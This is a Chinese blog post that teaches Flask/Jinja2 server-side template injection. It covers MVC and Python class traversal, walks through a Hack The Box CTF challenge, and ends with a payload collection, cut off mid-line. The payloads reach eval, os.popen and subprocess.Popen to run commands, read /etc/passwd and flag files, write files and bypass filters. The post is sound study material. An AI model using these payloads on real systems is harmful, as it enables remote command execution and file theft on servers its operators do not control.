

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/icon.jpg">
  <link rel="icon" href="/img/icon.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="pepper">
  <meta name="keywords" content="">
  
    <meta name="description" content="学习HTB的过程中接触到SSTI，在此做总结记录。">
<meta property="og:type" content="article">
<meta property="og:title" content="SSTI">
<meta property="og:url" content="http://example.com/2022/03/26/SSTI/index.html">
<meta property="og:site_name" content="Pepper&#39;s home">
<meta property="og:description" content="学习HTB的过程中接触到SSTI，在此做总结记录。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Little-pepper/images/202203231537427.png">
<meta property="article:published_time" content="2022-03-26T10:27:53.000Z">
<meta property="article:modified_time" content="2022-04-11T09:50:03.249Z">
<meta property="article:author" content="pepper">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/Little-pepper/images/202203231537427.png">
  
  
  <title>SSTI - Pepper&#39;s home</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/agate.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 6.1.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Pepper’s home</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                文章
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/window.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="SSTI">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-03-26 18:27" pubdate>
        2022年3月26日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      11k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      88 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">SSTI</h1>
            
            <div class="markdown-body">
              <h2 id="SSTI初识"><a href="#SSTI初识" class="headerlink" title="SSTI初识"></a>SSTI初识</h2><h3 id="从何而来？"><a href="#从何而来？" class="headerlink" title="从何而来？"></a>从何而来？</h3><blockquote>
<p>MVC模型与网站模板引擎</p>
</blockquote>
<p>讲SSTI之前，首先需要了解MVC模型。MVC是一种开发框架，全名是Model View Controller。</p>
<p>也即模型(model)－视图(view)－控制器(controller)</p>
<p>在MVC框架中，用户的输入通过 View 接收，交给 Controller ，然后由 Controller 调用 Model 或者其他的 Controller 进行处理，最后再返回给 View ，这样就最终显示在我们的面前了，那么这里的 View 就会大量地运用一种叫<strong>网站模板引擎的技术</strong>。</p>
<p>通俗的讲，整个过程就是拿到数据处理，塞到模板里，然后让渲染引擎将塞进去的东西生成 html 的文本，返回给浏览器，这样做的好处展示数据快，大大提升效率。</p>
<p>常见的模板引擎：</p>
<ul>
<li><strong>php</strong>：Smarty、Twig、Blade</li>
<li><strong>java</strong>：jsp、Velocity</li>
<li><strong>python</strong>：flask&#x2F;jinjia2、django(ORM)、tornado</li>
<li><strong>ruby</strong>：erb</li>
</ul>
<p>再回到SSTI，SSTI全称服务端模板注入，起因是服务端接收了用户的输入，将其作为 Web 应用模板内容的一部分，在进行目标编译渲染的过程中（渲染函数），执行了用户插入的恶意内容，从而导致各种各样的问题。—— 与sql注入类似，相信用户的输入并做了执行。</p>
<h2 id="SSTI前置知识"><a href="#SSTI前置知识" class="headerlink" title="SSTI前置知识"></a>SSTI前置知识</h2><h3 id="内建函数"><a href="#内建函数" class="headerlink" title="内建函数"></a>内建函数</h3><blockquote>
<p>启动 python 解释器时，即使没有创建任何变量或函数还是会有很多函数可供使用，这些就是 python 的内建函数</p>
<p>在 Python 交互模式下，使用命令 <code>dir(&#39;builtins&#39;)</code> 即可查看当前 Python 版本的一些内建变量、内建函数，内建函数可以调用一切函数</p>
</blockquote>
<h3 id="类继承"><a href="#类继承" class="headerlink" title="类继承"></a>类继承</h3><blockquote>
<ul>
<li>构造 Python-SSTI 的 Payload 需要什么是类继承</li>
<li>Python 中一切均为对象，均继承于 object 对象，Python 的 object 类中集成了很多的基础函数，假如需要在 Payload 中使用某个函数就需要用 object 去操作</li>
</ul>
</blockquote>
<blockquote>
<ul>
<li>常见的继承关系的方法有以下三种:</li>
</ul>
<ol>
<li><strong>base</strong>：对象的一个基类，一般情况下是 object</li>
<li><strong>mro</strong>：获取对象的基类，只是这时会显示出整个继承链的关系，是一个列表，object 在最底层所以在列表中的最后，通过 <strong>mro</strong>[-1] 可以获取到</li>
<li><strong>subclasses</strong>()：继承此对象的子类，返回一个列表</li>
</ol>
</blockquote>
<h3 id="攻击链寻找"><a href="#攻击链寻找" class="headerlink" title="攻击链寻找"></a>攻击链寻找</h3><blockquote>
<p>攻击方式为：变量 -&gt; 对象 -&gt; 基类 -&gt; 子类遍历 -&gt; 全局变量</p>
</blockquote>
<p>基础类的执行</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python">__class__  返回类型所属的对象（类）<br>__mro__    返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。<br>__base__   返回该对象所继承的基类<br>// __base__和__mro__都是用来寻找基类的<br>__subclasses__   每个新类都保留了子类的引用，这个方法返回一个类中仍然可用的的引用的列表<br>__init__  类的初始化方法<br>__globals__  对包含函数全局变量的字典的引用<br><br><span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__[-<span class="hljs-number">1</span>]<br>&#123;&#125;.__class__.__bases__[<span class="hljs-number">0</span>]<br>().__class__.__bases__[<span class="hljs-number">0</span>]<br>[].__class__.__bases__[<span class="hljs-number">0</span>]<br></code></pre></div></td></tr></table></figure>

<p>此外，在引入了 Flask&#x2F;Jinja 的相关模块后还可以通过以下字符来获取基本类</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python">config<br>request<br>url_for<br>get_flashed_messages<br>self<br>redirect<br></code></pre></div></td></tr></table></figure>

<p>获取基本类后，继续向下获取基本类 (object) 的子类</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-built_in">object</span>.__subclasses__()<br></code></pre></div></td></tr></table></figure>

<p>写一个遍历子类</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> re<br><span class="hljs-keyword">import</span> html<br>url = <span class="hljs-string">&quot;http://161.35.47.235:31391/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D&quot;</span><br>result = html.unescape(requests.get(url).text)<br>type_list = re.findall(<span class="hljs-string">r&quot;&lt;type &#x27;.*?&#x27;&gt;|&lt;class &#x27;.*?&#x27;&gt;&quot;</span>, result)<br><span class="hljs-built_in">print</span>(type_list)<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(type_list)):<br>    <span class="hljs-built_in">print</span>(i, type_list[i])<br></code></pre></div></td></tr></table></figure>

<p>找到重载过的 <code>__init__</code> 类，在获取初始化属性后，带 <code>wrapper</code> 的说明没有重载。这些并不是function，不具有<code>__globals__</code>属性。</p>
<p>再换几个子类，很快就能找到一个重载过__init__的类；也可以利用 <code>.index()</code>去找 <code>file</code>, <code>warnings.catch_warnings</code></p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__[<span class="hljs-number">2</span>].__subclasses__()[<span class="hljs-number">99</span>].__init__<br>&lt;slot wrapper <span class="hljs-string">&#x27;__init__&#x27;</span> of <span class="hljs-string">&#x27;object&#x27;</span> objects&gt;<br><br><span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__[<span class="hljs-number">2</span>].__subclasses__()[<span class="hljs-number">59</span>].__init__<br>&lt;unbound method WarningMessage.__init__&gt;<br></code></pre></div></td></tr></table></figure>

<p>查看其引用 <code>__builtins__</code></p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__[<span class="hljs-number">2</span>].__subclasses__()[<span class="hljs-number">138</span>].__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>]<br></code></pre></div></td></tr></table></figure>

<p>这里会返回 dict 类型，寻找 keys 中可用函数，使用 keys 中的 file 等函数来实现读取文件的功能</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__[-<span class="hljs-number">1</span>].__subclasses__()[<span class="hljs-number">138</span>].__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-string">&#x27;file&#x27;</span>](<span class="hljs-string">&#x27;/etc/passwd&#x27;</span>).read()<br></code></pre></div></td></tr></table></figure>

<p>常见的<strong>目标函数</strong>：</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python">file<br>subprocess.Popen<br>os.popen<br><span class="hljs-built_in">exec</span><br><span class="hljs-built_in">eval</span><br></code></pre></div></td></tr></table></figure>

<h3 id="Flask-demo"><a href="#Flask-demo" class="headerlink" title="Flask demo"></a>Flask demo</h3><p>这里以为flask 的ssti demo为例，进行学习</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask<br><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> render_template<br><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> request<br><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> render_template_string<br>app = Flask(__name__)<br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/test&#x27;</span>,methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">test</span>():<br>    template = <span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">        &lt;div class=&quot;center-content error&quot;&gt;</span><br><span class="hljs-string">            &lt;h1&gt;Oops! That page doesn&#x27;t exist.&lt;/h1&gt;</span><br><span class="hljs-string">            &lt;h3&gt;%s&lt;/h3&gt;</span><br><span class="hljs-string">        &lt;/div&gt; </span><br><span class="hljs-string">    &#x27;&#x27;&#x27;</span> %(request.url)<br>    <span class="hljs-keyword">return</span> render_template_string(template)<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    app.run(host=<span class="hljs-string">&#x27;127.0.0.1&#x27;</span>, debug=<span class="hljs-literal">True</span>)<br></code></pre></div></td></tr></table></figure>

<p>jinjia的语言格式：</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash">控制结构 &#123;% %&#125;<br>变量取值 &#123;&#123; &#125;&#125;<br>注释 &#123;<span class="hljs-comment"># #&#125;</span><br></code></pre></div></td></tr></table></figure>

<p>参考：<a target="_blank" rel="noopener" href="https://www.136.la/jingpin/show-40163.html">flask之ssti模版注入从零到入门</a></p>
<h2 id="HTB-template练习"><a href="#HTB-template练习" class="headerlink" title="HTB-template练习"></a>HTB-template练习</h2><p>Hack the box提供了SSTI注入的web CTF题，访问后发现页面存在flask&#x2F;jinjia2的提示，联想到ssti，进行测试</p>
<p><img src="https://cdn.jsdelivr.net/gh/Little-pepper/images/202203301530344.png" srcset="/img/loading.gif" lazyload alt="image-20220330153012307"></p>
<p>发现后端确实存在请求输入语句的解析和执行</p>
<p><img src="https://cdn.jsdelivr.net/gh/Little-pepper/images/202203301529907.png" srcset="/img/loading.gif" lazyload alt="image-20220330152953856"></p>
<p>于是利用python类继承特性，寻找可利用载荷</p>
<h3 id="寻找基类及可利用子类"><a href="#寻找基类及可利用子类" class="headerlink" title="寻找基类及可利用子类"></a>寻找基类及可利用子类</h3><p>首先查找object基类，并遍历其子类，寻找可使用的模块<code>warnings.catch_warnings</code>,为了方便获得子类序号，编写脚本如下，顺利找到编号185（当然，也可以利用类<code>413 &lt;class &#39;subprocess.Popen&#39;&gt;</code>）。</p>
<p><img src="https://cdn.jsdelivr.net/gh/Little-pepper/images/202203301625342.png" srcset="/img/loading.gif" lazyload alt="image-20220330162531183"></p>
<p>实际上也并非必须<code>warnings.catch_warnings</code>，可利用以下方式来寻找其他可利用的类，核心是找可以重载的函数，从而获取globals全局变量</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-comment">#从中随便选一个类,查看它的__init__</span><br><span class="hljs-meta">&gt;&gt;&gt; </span><span class="hljs-string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()[<span class="hljs-number">30</span>].__init__<br>&lt;slot wrapper <span class="hljs-string">&#x27;__init__&#x27;</span> of <span class="hljs-string">&#x27;object&#x27;</span> objects&gt;<br><span class="hljs-comment"># wrapper是指这些函数并没有被重载，这时他们并不是function，不具有__globals__属性</span><br><span class="hljs-comment">#再换几个子类，很快就能找到一个重载过__init__的类，比如</span><br></code></pre></div></td></tr></table></figure>

<p>比如这里，测试发现第184个子类重载，那么同样可以利用其获取全局变量，然后获取内建模块，并引用内建函数，从而进行os、eval等操作</p>
<p><img src="https://cdn.jsdelivr.net/gh/Little-pepper/images/202203301704736.png" srcset="/img/loading.gif" lazyload alt="image-20220330170420513"></p>
<h3 id="寻找利用函数与命令执行"><a href="#寻找利用函数与命令执行" class="headerlink" title="寻找利用函数与命令执行"></a>寻找利用函数与命令执行</h3><p>切入载荷的方法有很多，这里回归正题，仍用<code>warnings.catch_warnings</code>来完成测试。上面获取到可利用子类后，查看该模块的全局变量，并且定位到内建模块，<code>__globals__[&#39;__bultins&#39;__]</code>，内建模块中有很多内建函数可供使用：<code>import、eval、exec、open等</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/Little-pepper/images/202203301748907.png" srcset="/img/loading.gif" lazyload alt="image-20220330174846788"></p>
<p>3.这里尝试执行命令，先获取目录下文件：</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-number">161.35</span><span class="hljs-number">.47</span><span class="hljs-number">.235</span>:<span class="hljs-number">31391</span>/&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__[-<span class="hljs-number">1</span>].__subclasses__()[<span class="hljs-number">185</span>].__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-string">&#x27;eval&#x27;</span>](<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&quot;</span>)&#125;&#125;<br></code></pre></div></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/Little-pepper/images/202203301753568.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>4.然后就是读取文件了：这里分别使用内建函数<code>eval</code>和<code>open</code>进行读取</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-comment">## 采用eval</span><br><span class="hljs-number">161.35</span><span class="hljs-number">.47</span><span class="hljs-number">.235</span>:<span class="hljs-number">31391</span>/&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__[-<span class="hljs-number">1</span>].__subclasses__()[<span class="hljs-number">185</span>].__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-string">&#x27;eval&#x27;</span>](<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;cat flag.txt&#x27;).read()&quot;</span>)&#125;&#125;<br></code></pre></div></td></tr></table></figure>



<p><img src="https://cdn.jsdelivr.net/gh/Little-pepper/images/202203301813495.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-comment">## 采用open</span><br>http://<span class="hljs-number">161.35</span><span class="hljs-number">.47</span><span class="hljs-number">.235</span>:<span class="hljs-number">31391</span>/%7B%7<span class="hljs-string">B&#x27;&#x27;</span>.__class__.__mro__[-<span class="hljs-number">1</span>].__subclasses__()[<span class="hljs-number">185</span>].__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-string">&#x27;open&#x27;</span>](<span class="hljs-string">&#x27;flag.txt&#x27;</span>).read()%7D%7D<br></code></pre></div></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/Little-pepper/images/202203301813748.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="payload大全"><a href="#payload大全" class="headerlink" title="payload大全"></a>payload大全</h2><h4 id="读取文件"><a href="#读取文件" class="headerlink" title="读取文件"></a>读取文件</h4><p><code>&lt;type ‘file’&gt;</code> file位置一般为40，直接调用</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash">[].__class__.__base__.__subclasses__()[40](<span class="hljs-string">&#x27;fl4g&#x27;</span>).<span class="hljs-built_in">read</span>()<br></code></pre></div></td></tr></table></figure>

<p><code>&lt;class ‘site._Printer’&gt;</code> 调用os的popen执行命令</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash">&#123;&#123;[].__class__.__base__.__subclasses__()[71].__init__[<span class="hljs-string">&#x27;__glo&#x27;</span>+<span class="hljs-string">&#x27;bals__&#x27;</span>][<span class="hljs-string">&#x27;os&#x27;</span>].popen(<span class="hljs-string">&#x27;ls&#x27;</span>).<span class="hljs-built_in">read</span>()&#125;&#125;<br>[].__class__.__base__.__subclasses__()[71].__init__[<span class="hljs-string">&#x27;__glo&#x27;</span>+<span class="hljs-string">&#x27;bals__&#x27;</span>][<span class="hljs-string">&#x27;os&#x27;</span>].popen(<span class="hljs-string">&#x27;ls /flasklight&#x27;</span>).<span class="hljs-built_in">read</span>()<br>[].__class__.__base__.__subclasses__()[71].__init__[<span class="hljs-string">&#x27;__glo&#x27;</span>+<span class="hljs-string">&#x27;bals__&#x27;</span>][<span class="hljs-string">&#x27;os&#x27;</span>].popen(<span class="hljs-string">&#x27;cat coomme_geeeett_youur_flek&#x27;</span>).<span class="hljs-built_in">read</span>()<br></code></pre></div></td></tr></table></figure>

<p>如果system被过滤，用os的listdir读取目录+file模块读取文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash">().__class__.__base__.__subclasses__()[71].__init__.__globals__[<span class="hljs-string">&#x27;os&#x27;</span>].listdir(<span class="hljs-string">&#x27;.&#x27;</span>)<br></code></pre></div></td></tr></table></figure>

<p><code>&lt;class ‘subprocess.Popen’&gt;</code> 位置一般为258</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash">&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__[2].__subclasses__()[258](<span class="hljs-string">&#x27;ls&#x27;</span>,shell=True,stdout=-1).communicate()[0].strip()&#125;&#125;<br>&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__[2].__subclasses__()[258](<span class="hljs-string">&#x27;ls /flasklight&#x27;</span>,shell=True,stdout=-1).communicate()[0].strip()&#125;&#125;<br>&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__[2].__subclasses__()[258](<span class="hljs-string">&#x27;cat /flasklight/coomme_geeeett_youur_flek&#x27;</span>,shell=True,stdout=-1).communicate()[0].strip()&#125;&#125;<br></code></pre></div></td></tr></table></figure>

<h4 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h4><p><code>&lt;class ‘warnings.catch_warnings’&gt;</code><br>一般位置为59，可以用它来调用file、os、eval、commands等</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment">#调用file</span><br><span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-string">&#x27;file&#x27;</span>](<span class="hljs-string">&#x27;/etc/passwd&#x27;</span>).<span class="hljs-built_in">read</span>()      <span class="hljs-comment">#把 read() 改为 write() 就是写文件</span><br><span class="hljs-comment">#读文件</span><br>().__class__.__bases__[0].__subclasses__()[40](r<span class="hljs-string">&#x27;C:\1.php&#x27;</span>).<span class="hljs-built_in">read</span>()<br>object.__subclasses__()[40](r<span class="hljs-string">&#x27;C:\1.php&#x27;</span>).<span class="hljs-built_in">read</span>()<br><span class="hljs-comment">#写文件</span><br>().__class__.__bases__[0].__subclasses__()[40](<span class="hljs-string">&#x27;/var/www/html/input&#x27;</span>, <span class="hljs-string">&#x27;w&#x27;</span>).write(<span class="hljs-string">&#x27;123&#x27;</span>)<br>object.__subclasses__()[40](<span class="hljs-string">&#x27;/var/www/html/input&#x27;</span>, <span class="hljs-string">&#x27;w&#x27;</span>).write(<span class="hljs-string">&#x27;123&#x27;</span>)<br><br><span class="hljs-comment">#调用eval</span><br>[].__class__.__base__.__subclasses__()[59].__init__[<span class="hljs-string">&#x27;__glo&#x27;</span>+<span class="hljs-string">&#x27;bals__&#x27;</span>][<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-string">&#x27;eval&#x27;</span>](<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&quot;</span>)<br><span class="hljs-comment">#调用system方法</span><br>&gt;&gt;&gt; [].__class__.__base__.__subclasses__()[59].__init__.__globals__[<span class="hljs-string">&#x27;linecache&#x27;</span>].__dict__.values()[12].__dict__.values()[144](<span class="hljs-string">&#x27;whoami&#x27;</span>)<br>root<br>0<br><span 